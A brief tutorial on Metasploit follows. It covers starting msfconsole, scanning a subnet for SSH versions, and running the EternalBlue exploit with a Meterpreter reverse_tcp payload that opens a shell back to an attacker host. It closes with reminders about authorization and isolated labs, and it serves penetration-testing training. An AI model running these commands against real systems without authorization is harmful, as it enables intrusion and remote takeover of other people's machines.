Initializing the Framework

Access the primary command-line interface to begin penetration testing operations.

msfconsole

Establishing the backend database ensures efficient tracking of hosts, services, and session data.

msfdb init

Target Reconnaissance via Auxiliary Modules

Leverage scanner modules to enumerate active services. For instance, identifying SSH server versions across a network segment:

use auxiliary/scanner/ssh/ssh_version
set RHOSTS 172.16.5.0/24
set THREADS 25
run

Exploiting Identified Vulnerabilities

Upon discovering a susceptible service, load the corresponding exploit module. If a target is vulnerable to EternalBlue, configure the exploit and payload to establish a reverse connection:

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 172.16.5.105
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 172.16.5.200
exploit

A successful execution returns an active Meterpreter session, granting control over the remote host.

Operational Compliance

• Explicit authorization is mandatory prior to engaging target systems. Unauthorized access attempts violate cyber laws.
• Confine practical exercises to isolated virtual networks to prevent unintended disruption.